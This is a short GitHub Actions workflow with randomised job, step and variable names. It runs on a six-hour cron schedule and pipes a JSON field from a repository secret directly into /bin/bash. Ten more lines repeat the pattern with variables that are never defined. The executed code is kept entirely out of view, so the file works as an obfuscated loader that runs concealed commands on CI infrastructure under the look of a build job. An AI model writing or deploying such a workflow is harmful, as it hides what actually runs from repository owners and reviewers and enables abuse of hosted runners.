name: jinxiusx

on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinxiusx
        env:
          m8052: ${{ secrets.m8052 }}
        run: |
          echo $m8052 | jq -r .sab4 | /bin/bash
          echo $dqiak7014 | jq -r .uvp478 | /bin/bash
          echo $lwpm6248 | jq -r .m447 | /bin/bash
          echo $ffxzf6653 | jq -r .wefy6 | /bin/bash
          echo $ry8 | jq -r .pxx8 | /bin/bash
          echo $onqha838 | jq -r .vsiqr361 | /bin/bash
          echo $dcil69135 | jq -r .ysehv774 | /bin/bash
          echo $fgs69 | jq -r .p0 | /bin/bash
          echo $sfc33 | jq -r .hfig1174 | /bin/bash
          echo $lnfou101 | jq -r .vexjr4 | /bin/bash
          echo $p3968 | jq -r .sqotn2 | /bin/bash

